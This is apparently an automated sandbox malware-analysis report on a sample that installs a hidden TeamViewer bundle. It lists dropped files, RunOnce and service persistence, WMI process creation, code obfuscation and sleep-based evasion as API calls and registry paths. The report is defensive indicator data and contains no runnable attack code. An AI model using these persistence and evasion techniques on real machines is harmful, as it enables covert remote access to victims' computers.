Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Contains functionality to delete services

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF3700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,

3_2_6EAF3700

Source: 77Etc0bR2v.exe	Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe	ReversingLabs: Detection: 37%

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File read: C:\Users\user\Desktop\77Etc0bR2v.exe

Jump to behavior

Source: 77Etc0bR2v.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	3_2_6EAF5B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004C6E36 AdjustTokenPrivileges,	6_2_004C6E36
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_6EAF5B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	8_2_6EAF5B40

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File created: C:\Users\user\AppData\Roaming\TeamViewer

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File created: C:\Users\user\AppData\Local\Temp\nsa6984.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.evad.winEXE@22/12@4/4

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF29D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

3_2_6EAF29D0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,	3_2_6EAF3C60
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,	6_2_6EAF3C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,	8_2_6EAF3C60

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,753CA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_00404356

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF96D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,

3_2_6EAF96D0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF3C60 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,

3_2_6EAF3C60

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAPEAAAAA
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4012:120:WilError_01
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF4E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,

3_2_6EAF4E50

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

File created: C:\Program Files (x86)\QS

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

File written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini

Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 77Etc0bR2v.exe

Static file information: File size 1828192 > 1048576

Source: 77Etc0bR2v.exe

Static PE information: certificate valid

Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source:	Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFC101 push ecx; ret	3_2_6EAFC114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0075C004 push ebp; retf	6_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053E60D push ecx; ret	6_2_0053E620
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053BD8D push ecx; ret	6_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0075BFE4 push ebp; retf	6_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFC101 push ecx; ret	6_2_6EAFC114
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFC101 push ecx; ret	8_2_6EAFC114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C1E67 push edx; iretd	18_2_026C1E69
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C062B push edi; retf 0019h	18_2_026C062C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C181B push ebp; retf 006Bh	18_2_026C181C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026CA91B push edx; retn 0064h	18_2_026CA924
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C1AF3 push esp; retf 0078h	18_2_026C1AF4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C12D7 push ebp; retf 0054h	18_2_026C1314
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 18_2_026C15B2 push ebp; ret	18_2_026C15E9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026E3A8E push eax; retf	19_3_026E3A99
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AD4F0 push esp; ret	19_3_026AD4F8
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AD070 push eax; ret	19_3_026AD077
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AFB5E push ecx; retf	19_3_026AFB5F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026AF306 push eax; ret	19_3_026AF31F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026B2686 push ecx; retf	19_3_026B2687
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026CC376 push ecx; retf	19_3_026CC377
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026CCC32 push ecx; ret	19_3_026CCC33
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026C9888 push eax; ret	19_3_026C988F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 19_3_026C9D08 push esp; ret	19_3_026C9D10
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_02813210 push eax; retf	20_3_02813211
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027DFBC7 push es; retf	20_3_027DFBCA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B6650 push cs; retf	20_3_027B6652
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B6A3C push es; ret	20_3_027B6A3E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B7732 push esi; iretd	20_3_027B7752
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 20_3_027B770F push ss; ret	20_3_027B7712

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00405E88

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	File created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll	Jump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	File created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	File created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAF44D0 FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,GetPrivateProfileIntA,InvertRect,InvertRect,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InvertRect,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,wsprintfA,InvertRect,InvertRect,InvertRect,InvertRect,FrostCrashedWindow,InvertRect,FrostCrashedWindow,InvertRect,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,	3_2_6EAF44D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,	6_2_004E177C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,	6_2_6EAF44D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAF44D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,	8_2_6EAF44D0

Boot Survival:

Creates or modifies windows services

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF37D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,

3_2_6EAF37D0

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004FB7F9	6_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004DC9D6	6_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00500C6A	6_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_004FFF68	6_2_004FFF68

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 4668	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100	Thread sleep count: 99 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100	Thread sleep time: -49500s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

